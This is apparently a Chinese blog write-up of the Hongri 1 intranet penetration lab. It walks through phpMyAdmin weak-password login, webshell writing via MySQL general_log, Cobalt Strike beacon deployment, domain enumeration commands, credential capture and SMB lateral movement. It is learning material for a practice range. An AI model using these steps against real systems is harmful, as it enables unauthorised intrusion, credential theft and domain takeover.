从红日靶场开始的内网渗透测试

使用lingjing开启红日1靶场,灵境十分便利强烈推荐👍

信息收集

image-20251121181137423

启动后直接显示ip地址,第一步使用nmap进行扫描

image-20251121181209109

开的服务挺多的

先查看80端口访问ip

image-20251121194401723

出现的是一个phpstudy探针,可知该服务实在windows下使用小皮进行搭建的,扫描目录

image-20251121200022911

扫描目录可以看到其有phpmyadmin的后台访问看看

web漏洞利用

image-20251121200246090

进入管理登录界面

弱密码尝试,root,root更改登入phpmyadmin得管理界面

SHOW GLOBAL VARIABLES LIKE ‘%secure%’

查询系统变量

image-20251121204105024

发现字段为null,不可写,如果为空表示可写任意目录,如果是一个路径则指定了只能写入该路径

新知识点: 当secure_file_priv为NULL时,表示限制Mysql不允许导入导出,这里为NULL。所以into outfile写入木马出错。要想使得该语句导出成功,则需要在Mysql文件夹下修改my.ini 文件,在[mysqld]内加入secure_file_priv =””。

直接写入木马不行,那我们就换另一种方法—Mysql日志文件写入shell

参考文章mysql日志文件开启及详解:General_log 和 Binlog - zhangzhiping35 - 博客园

查看是否能通过日志写入:SHOW VARIABLES LIKE ‘%general%’

image-20251121204824550

发现日志关闭,那就打开日志:set global general_log=’on’;

image-20251121205025400

更改日志路径为web网站路径 set global general_log_file = ‘C:/phpstudy_pro/WWW/test.php’方便写入木马

随便写一个sql语句即可

之后使用哥斯拉进行连接即可,此处不知道为什么蚁剑一直连接不上于是使用了哥斯拉进行连接

image-20251123224436198

image-20251123231215948

域内信息收集

之后使用cs进行操作,首先

./teamserver 192.168.103.7 123456 //本机ip+密码-密码随便设置

然后再启动cs的客户端,创建后门程序利用蚁剑将后门程序上传

image-20251203171158867

image-20260107173353745运行程序image-20260107173455735

回来看cs,已经成功上线。

image-20260107173520126

image-20260107173925863

net view # 查看局域网内其他主机名
net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user # 查看本机用户列表
net user /domain # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain # 查看有几个域
net user 用户名 /domain # 获取指定域用户的信息
net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain # 查看域中某工作组
net group “domain admins” /domain # 查看域管理员的名字
net group “domain computers” /domain # 查看域中的其他主机名
net group “doamin controllers” /domain # 查看域控制器主机名(可能有多台)
使用shell ipconfig/all查看域内信息

image-20260107174301703

可以看到域为god.org

image-20260107174411672

接下里我们要进行横向移动,扫描端口。

image-20260107174701797

发现开启了445端口smb服务

image-20260107175242831

之后创建smb监听器抓取明文账号密码

image-20260107175459329

之后使用cs进行内网横移即可

image-20260107175949010

选择刚才的smb服务和第一台出网主机

image-20260107180023951

运行之后一短时间即可发现其已经上线。image-20260107180133207

利用相同的操作即可实现域内所有主机全部上线。

image-20260107180801216